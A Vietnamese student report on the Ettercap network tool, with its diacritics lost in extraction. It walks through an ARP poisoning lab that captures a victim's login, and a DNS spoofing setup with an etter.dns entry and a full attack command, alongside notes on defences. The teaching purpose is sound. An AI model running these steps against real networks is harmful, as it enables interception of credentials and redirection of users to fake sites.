BTQLMang_Ettercap_

8/3/2019 BTQLMang_Ettercap_

1/21

Phn mm QLM Ettercap Nhm 2 H09VT9

TM HIU PHN MM QUN L MNG ETTERCAP

LI M U

C th ni ngy nay trong khoa hc my tnh khng lnh vc no c th quantrng hn lnh vc ni mng. Mng my tnh l hai hay nhiu my tnh c kt

ni vi nhau theo mt cch no sao cho chng c th trao i thng tin qua li

vi nhau, dng chung hoc chia s d liu thng qua vic in n hay sao chp qua

a mm, CDRom.

V vy h tng mng my tnh l phn khng th thiu trong cc t chc hay

cc cng ty. Trong iu kin kinh t hin nay hu ht a s cc t chc hay cng ty

c phm vi s dng b gii hn bi din tch v mt bng u trin khai xy dng

mng LAN phc v cho vic qun l d liu ni b c quan mnh c thun

li, m bo tnh an ton d liu cng nh tnh bo mt d liu mt khc mng

Lan cn gip cc nhn vin trong t chc hay cng ty truy nhp d liu mt cch

thun tin vi tc cao. Mt im thun li na l mng LAN cn gip cho

ngi qun tr mng phn quyn s dng ti nguyn cho tng i tng l ngi

dng mt cch r rng v thun tin gip cho nhng ngi c trch nhim lnh o

cng ty d dang qun l nhn vin v iu hnh cng ty. Bn cnh , ngi quntr mng cng cn phi c nhng phng thc sao cho vn bo mt d liu

c t ln hng u, trnh s tn cng ca hacker. lm c vic ny, cn

phi c s tm ti, nghin cu v th nghim mt s cng c phn mm h tr cho

vic qun l mng. Nhm 2 chng em i tm hiu v th nghim phn mm

qun l mng Ettercap dng cho window XP. Vi h hon chnh kin thc nh

chng em th vn nghin cu v th nghim cng l 1 vn kh. Do kin thc

v thi gian c hn, bi vit khng th trnh khi nhng sai st nht nh. Rtmong nhn c s ng gp, trao i t qu Thy c v cc bn bi vit c

hon chnh hn.

Xin trn trng cm n!

H Ni, ngy 20 thng 6 nm 2011

Nhm thc hin

Nhm 2


2/21


1.TM HIU CHUNG V PHN MM

1.1Thng tin chung v phn mm

Ettercap l mt cng c trung gian gia cc cuc tn cng trong mng LAN.

N c tnh nng tm kim cc cc kt ni trc tip, lc ni dung chuyn trn mng

v nhiu th thut th v khc. N h tr m s hot ng v th ng ca nhiugiao thc (ngay c vi Ciphered) v bao gm nhiu tnh nng cho mng li phn

tch v my ch.

1.2 Mc ch

- Vi Ettercap bn c th theo di nhng lu lng thng tin hot ng trn h

thng mng ca bn, chp cc thng tin, hin th v can thip vo cc kt ni,

theo di cc host ang trao i trn mng .

- H tr k thut tn cng Address Resolution Protocol (ARP) spoofing hay cngi l ARP flooding, ARP poisoning hay ARP Poison Routing (APR). l cch

tn cng t mt my tnh trong mng LAN, thng qua giao thc ARP v a ch

MAC, IP, n nhm ngt kt ni t mt hay mt s my tnh vi Modem, dn n

tnh trng cc my tnh khng th truy cp Internet.

- Ngoi ra cn dng trong 1 kiu tn cng MITM khc l gi mo DNS (DNS

Spoofing).

1.3 Cc chc nng chnho SSH1 Support:bn c th ly c tn ngi dng v mt khu hoc thm

ch l CSDL ca 1 SSH1 connection.

o HTTP support: bn c th ly c d liu t HTTP SSL... v ngay c khi

kt ni c thc hin thng qua mt proxy.

o Giao thng t xa thng qua ng hm GRE : bn c th sniff lu lng truy

cp t xa thng qua mt ng hm GRE t mt b nh tuyn ca Cisco v

thc hin cc cuc tn cng MiTM vo n.o PPTP mi gii : bn c th thc hin l 1 ngi dng trong cuc tn cng

chng li gia PPTP.

o Mt khu thu cho : Telnet, FTP, POP, RLOGIN, SSH1, ICQ, na, MySQL,

HTTP, nntp, X11, NAPSTER, IRC, RIP, BGP, Socks 5, IMAP 4, VNC,

LDAP, giao thc NFS, SNMP, HALF LIFE , Quake 3, MSN, YMSG.

o Lc gi/th : Bn c th thit lp mt b lc m tm kim cho mt chui (k

c hex) trong TCP hay UDP Payload v thay th n bng my ca bn hocdrop ton b gi.


3/21


o H iu hnh du vn tay: bn c th gi du vn tay h iu hnh ca cc

nn nhn v thm ch l c router mesh.

o Kill mt kt ni: kt ni t danh sch, bn c th git cht tt c cc kt ni

bn mun.

o Th ng qut cc mng LAN: bn c th ly thng tin cc my trong mngLAN, m cng, cc phin bn, loi ca cc my ch (gateway, router hoc

n ginl 1host) v c tnh t xa trong mt bc mng.

o Kim tra poisoners khc: Ettercap c kh nng ch ng hoc th ng tm

poisonners khc trn mng.

2.PHN TCH MT S C IM CA ETTERCAP

2.1 M t giao din Ettercap trn giao din Windows XP

Ettercap c th chy trn Dos v trn nn windows, linux. Sau y em xinm t phn mm ettercap c ci t trn windows XP. Hnh di y s cho ta

thy giao din ca chng trnh khi ang theo di cc my tnh trong cng mng

LAN:

Ettercap vi tnh nng Network sniffer/interceptor/logger trn mng LAN.

Cng c ny cng h tr nhiu giao thc khc nhau. C nhiu mc c th trin

khai mang li hiu qu cao trong qu trnh Sniffering, nhiu Plugins h tr. H

tr LAN Switch v c kh nng OS fingerprint (on h iu hnh ca cc my

tnh online trn mng).


4/21


SNIFFer l g?

- L hnh thc nghe nn trn h thng mng, da trn nhng c im ca

c ch TCP/IP.

- Sniffer l k thut bo mt, c pht trin nhm gip nhng nh qun

tr mng khai thc mng hiu qu hn v c th kim tra cc d liu ra vo mng.Chc nng:

+ Thu thp gi tin trong h thng.

+ Gip qun tr mng kim tra tt h thng, li hay cc gi tin l.

Qua hnh nh trn, chng ta nhn thy cc thng tin quan trng v nhng tp

tin ring t c th b nh cp kh d dng. phng nga cc trng hp nh

vy, chng ta khng nn tin hnh cc hnh thc chng thc username v

password di dng vn bn n thun (khng m ha) m nn m ha chngbng IPSec hay SSL.

Ettercap l mt cng c mnh sniffer, n c th bt cc gi tin km an

ton mt cch r rng. Do , ta nn thay cc giao thc km an ton (Ftp, telnet,

smb) bng cc giao thc an ton hn, hay gia c thm chng (SSL, VPN+Ipsec).

M hnh mng s dng ettercap

Vi tnh nng Sniffer trn mi trng LAN Switch hiu qu v bo mt.

Ettercap (chng trnh c mnh danh l Lord Of The TokenRing).

Ettercap c th gi danh a ch MAC ca card mng my tnh b tn cng, thay v

gi tin c truyn n my tnh cn n th n li c chuyn n my tnh c

ci t ettercap trc ri sau mi truyn n my tnh ch. y l mt dng tn


5/21


cng rt nguy him c gi l Man In The Middle (MITM), trong trng hp ny

phin lm vic gia my gi v my nhn vn din ra bnh thng nn ngi s

dng khng h hay bit mnh ang b tn cng, ging nh trng hp b t my

nghe ln m chng ta thng gp trn phim nh. Nhng chng trnh dng ny

thng c gi l sniffer.

UniFied

Card mng 1

Bridget

Card mng 1 Card mng 2

Ettercap c mt sniffer mt khu mnh m, v c th tm v hin th mt

khu trong cc giao thc sau y: TELNET, FTP, POP, IMAP, rlogin, SSH1, ICQ,

SMB, MySQL, HTTP, NNTP, X11, Napster, IRC, RIP, BGP, SOCKS 5, IMAP 4,

LDAP, VNC, NFS, SNMP, Half-Life, Quake 3, MSN, YMSG

Darn, l mt LOT cc giao thc ti c th n cp mt khu t!

Sa cha v gi mo DNS

Ettercap c th nh chn cc yu cu DNS, kim tra i vi cu hnh ring

ca mnh, v tr li li vi mt IP bt hp php.

Gi phn ng xy ra trc khi cc phn ng thc s c th t c mc

tiu, do , my tnh nn nhn b qua n.

C th c thc hin d dng trong ch "thng nht", khng c cu ni

cn thit.

Victim Computer The Interwebz

Ettercap

Victim Computer The Interwebz

Ettercap


6/21


Cc Plug-in ca phn mm Ettercap

Bn c th dng chnh ettercap d tm ra chnh n cng nh cc chngtrnh sniffer khc trn mng theo phng php D c Tr c. Ettercap c hai

plug-in rt hu ch, mt dng tm kim cc my tnh chy chng trnh ettercap

khc trn mng v plug-in cn li dng pht hin cc chng trnh sniffer kh

nghi khc. V d, nu nghi ng c ai ang nghe ln trn mng, bn khi ng

ettercap v nhn phm P sau chn plug-in u tin s tm ra cc my ang chy

ettercap. Cn khi i phng s dng cc chng trnh khc nh dsniff, ta c th

d tm thng qua plug-in th 15 l arpcop, lc mt ca s mi s hin th nhngmy tnh ang chy cc chng trnh spoofing arp trn mng.

Khi xc nhn c i tng, ta c th tin hnh c lp my tnh ny khi

mng ngay lp tc bng cch chn P v chn plug-in tn l leech v sau chn

Yes, nhn Enter. Mt s ngi qun tr h thng cn dng ettercap pht hin

cc my b nhim virus ang pht tn trn mng ri c lp chng bng leech sau

dit bng cc chng trnh chng virus rt hiu qu.


7/21


2. S th nghim

-C 3 my tnh :-Mt my tnh C tn cng (attacker): IP:192.168.15.3; Mac: 00:18:9A:8E:3F:DE

-My A: IP 192.168.15. 1; Mac 00:17:9A:8E:2F:DE

-My victim B: IP:192.168.15.2 ; Mac 00:16:36:2E:D2:2E

- Mt switch : Kt ni 3 my tnh trn.

-Trn my tn cng C ci t phn Ettercap.

Trn my tinh C (Attacker): Cc bc thc hin ARP Spoofing

My TnhA

My TnhB

My TnhC

Attacker Victim

Switch


8/21


My tnh C Attacker mun thc hin ARP attack i vi my Victim B .

Attacker mun mi gi tin my A truyn ti my Victim B u c th chp li

c xem trm. Lm th no Attacker c th hin c iu ?

u tin, my A mun gi d liu cho Victim. my A cn phi bit a ch MAC

ca Victim (B) lin lc. my A s gi broadcast ARP Request ti tt c cc my

trong cng mng Lan hi xem IP 192.168.15.2 (IP ca Victim) c a ch MAC

l bao nhiu.- Attacker C, Victim B u nhn c gi tin ARP Request, nhng ch c

Victim B l gi li gi tin ARP Reply li cho HostA. ARP Reply cha thng tin v

IP ca Victim B, MAC Victim, MAC my A

Sau khi nhn c gi tin ARP Reply t Victim, my A bit c a ch

MAC ca Victim B. my A bt u thc hin lin lc, truyn d liu ti Victim.

Attacker C khng th xem ni dung d liu c truyn gia 2 my (my A v

Victim B)

1

M Ettercap ch ho #ettercap -G

2

Chn ch sniff:sniff/Unified sniffing

3

5

Scan cac hosts: hosts/scan forhosts

Xem a ch Mac v IP cac my trong mng: hosts/ hostslist

4

Chn my B u c: chn dng cha192.168.15.2 nhn nt Target 1

Hin 2 my: my A: IP 192.168.15. 1; Mac 00:17:9A:8E:2F:DEMy B: IP:192.168.15.2 ; Mac 00:16:36:2E:D2:2E

6 7

Kim tra mc tiu: Targets/ current Targets

8

Bt u u c ARP: Mitm/Arp poisoning Targets

9 Bt u Sniffer: start/ sniffing


9/21


Attacker C mun xem d liu truyn gia my A v Victim B . Attacker C s

dng kiu tn cng ARP Spoof. Attacker C thc hin gi lin tc ARP Reply cha

thng tin v IP Victim, MAC Attacker C, MAC my A. y, thay v l MAC

Victim B, Attacker i thnh a ch MAC ca mnh.

My A nhn c ARP Reply v ngh l IP Victim 192.168.15.2 s c a chMAC l 00:18:9A:8E:3F:DE ( MAC ca Attacker C). my A lu thng tin ny vo

bng ARP Cache.

By gi mi thng tin, d liu my A gi ti 192.168.15.2 (Victim), Attacker

u c th nhn c, Attacker c th xem tan b ni dung my A gi cho Victim

B

Attacker C cn c th kim sat tan b qu trnh lin lc gia my A v

Victim B thng qua ARP AttackAttacker C thng xuyn gi cc gi tin ARP Reply cha a ch IP ca my

A v Victim B nhng c a ch MAC l ca Attacker C.

my A nhn c gi tin ny th c ngh Victim B s c a ch MAC l

00:18:9A:8E:3F:DE (MAC ca Attacker C)

Victim nhn c gi tin ny th c ngh my A s c a ch MAC l

00:18:9A:8E:3F:DE (MAC ca Attacker)

Mi thng tin trao i gia my A v Victim B, Attacker C u c th nhnc. Nh vy l Attacker C c th bit c ni dung trao i gia my A v

Victim B

1. Tin trnh ci t chy th nghim

(chy th nghim trn 2 my PC)

Sau khi ci t ettercap, c giao din mn hnh nh sau :


10/21


Trn thanh cng c , chn sniff/Unified sniffing.

Mn hnh hin text box: yu cu ng nhp


11/21


Trong mc Network interface: ta in user eth0.

Thanh cng c xut hin nhiu chc nng hn : ta chn Targets/Current_Targets. Trong

phn ny ta c th xem trong mng lan c bao nhiu my tnh ( da trn di a ch hin

chi tit phn di)


12/21


Giao din xut hin target1 v target2 . trn thanh cng c chn : Host /Host List mn

hnh xut hin thng s ca 2 my tnh gm :

a ch IP / a ch MAC

My Attacker: c th hiu l my hacker, my Victim: l my b tn cng

y IP: 192.168.15.1 l my Attacker

IP: 192.168.15.2 l my Victim

Nhp chut vo di a ch my Victim n Add to Target1 , di a ch my hacker n

Add to Target2


13/21


Vo Mitm/MITM attack ARP Poisoning. Trong hp textbox chn Sniff remote

connections n OK.


14/21


Trong bng hin th pha di ca phn mm hin cc nhm , nhn Start sniffing

Chn Plugins/ Marage the plugins


15/21


Trong mc Plugins c hin th thng s

Nhp p chut mc repoison_arp


16/21


Trong phn Command Prompt g arp a

Nhp chut vo repoison_wtg, mc di xut hin user + pass ca my Victim khi ng

nhp trn trang web youtube.com


17/21


III. ng dng thc t trn mng ln

Tn cng gi mo DNS bng phng php gi mo DNS ID

Ettercap cn c chc nng tuyt gi mo DNS v c th c s dng thc hin

nhiu kiu tn cng MITM. y l cng c c th s dng cho c Windows v

Linux.

Nu ci t Ettercap trn my tnh Windows, bn s thy n c mt giao din

ha ngi dng (GUI) kh tuyt vi, tuy nhin trong v d ny, chng ti s sdng giao din dng lnh.

Trc khi thc thi Ettercap, yu cn bn cn phi thc hin mt cht cu hnh.

Ettercap mc li ca n l mt b nh hi (sniffer) d liu, n s dng plug-in

thc hin cc tn cng khc nhau. Plug-in dns_spoof l nhng g m chng ta s

thc hin trong v d ny, v vy chng ta phi iu chnh file cu hnh c lin

quan vi plug-in . Trn h thng Windows, file ny c th download ti

C:\Program Files (x86)\EttercapNG\share\etter.dns, v ti

/usr/share/ettercap/etter.dns. y l m file kh n gin v c cha cc bn ghi

DNS m bn mun gi mo. Vi mc ch th nghim, chng ta mun bt c

ngi dng no ang c gng truy cp vo yahoo.com u b hng (direct) n

mt host trn mng ni b, hy thm mt entry c nh du trong hnh 5.


18/21


Hnh 5: B sung bn ghi DNS gi mo vo etter.dns

Cc entry ny s ch dn cho plug-in dns_spoof rng khi thy truy vn DNS cho

yahoo.com hoc www.yahoo.com (vi mt bn ghi ti nguyn kiu A), n s s

dng a ch IP 172.16.16.100 p tr. Trong kch bn thc, thit b ti a ch

IP 172.16.16.100 s chy mt phn mm my ch web v hin th cho ngi dngwebsite gi mo.

Khi file ny c cu hnh v lu li, chng ta hon ton c th thc thi chui lnh

dng khi chy tn cng. Chui lnh s dng cc ty chn di y:

-T Ch nh s dng giao din vn bn-q Chy cc lnh trong ch yn

lng cc gi d liu c capture khng hin th trn mn hnh.-P

dns_spoof Ch nh s dng plug-in dns_spoof-M arp Khi to tn cng


19/21


MITM gi mo ARP chn cc gi d liu gia cc host.// // - Ch nh ton b

mng l mc tiu tn cng.

Chui lnh cui cng cho mc ch ca chng ta l:

Ettercap.exe T q P dns_spoof M arp // //

Khi chy lnh trn, bn s bt u mt tn cng hai giai on, u tin l gi mo

ARP cache ca thit b trn mng, sau l pht cc p tr truy vn DNS gi

mo.

Hnh 6: Ettercap ang lng nghe tch cc cc truy vn DNS

Khi khi chy, bt c ai ang c gng truy cp www.yahoo.com s u b redirect

n website m c ca chng ta.


20/21


Hnh 7: Kt qu c gng gi mo DNS t phi cnh ngi dng

Phng chng gi mo DNS

Kh kh phng chng vic gi mo DNS v c kh t cc du hiu tn cng. Thng

thng, bn khng h bit DNS ca mnh b gi mo cho ti khi iu xy ra.

Nhng g bn nhn c l mt trang web khc hon ton so vi nhng g mong

i. Trong cc tn cng vi ch ch ln, rt c th bn s khng h bit rng mnh

b la nhp cc thng tin quan trng ca mnh vo mt website gi mo cho ti

khi nhn c cuc gi t ngn hng hi ti sao bn li rt nhiu tin n vy.

Mc d kh nhng khng phi khng c bin php no c th phng chng cckiu tn cng ny, y l mt s th bn cn thc hin:

Bo v cc my tnh bn trong ca bn: Cc tn cng ging nh trn thng

c thc thi t bn trong mng ca bn. Nu cc thit b mng ca an ton th s

bn s gim c kh nng cc host b tha hip v c s dng khi chy tn

cng gi mo.Khng da vo DNS cho cc h thng bo mt: Trn cc h thng

an ton v c nhy cm cao, khng duyt Internet trn n l cch thc hin tt

nht khng s dng n DNS. Nu bn c phn mm s dng hostname thc

hin mt s cng vic ca n th chng cn phi c iu chnh nhng g cn

thit trong file cu hnh thit b.S dng IDS: Mt h thng pht hin xm nhp,

khi c t v trin khai ng, c th vch mt cc hnh thc gi mo ARP cache

v gi mo DNS.S dng DNSSEC: DNSSEC l mt gii php thay th mi cho

DNS, s dng cc bn ghi DNS c ch k bo m s hp l ha ca p tr

truy vn. Tuy DNSSEC vn cha c trin khi rng ri nhng n c chp

thun l tng lai ca DNS.Kt lun


21/21


Gi mo DNS l mt hnh thc tn cng MITM kh nguy him khi c i cp vi

nhng d nh c c. S dng cng ngh ny nhng k tn cng c th tn dng

cc k thut gi mo nh cp cc thng tin quan trng ca ngi dng, hay ci

t malware trn mt a b khai thc, hoc gy ra mt tn cng t chi dch v.

Trong phn tip theo ca lot bi ny, chng ti s gii thiu tip cho cc bn vcc tn cng pass the hash v tn cng ny c th c s dng nh th no

ng nhp vo cc my tnh Windows m khng cn n cc mt khu ngi

dng.

BTQLMang_Ettercap_

Documents

Transcript of BTQLMang_Ettercap_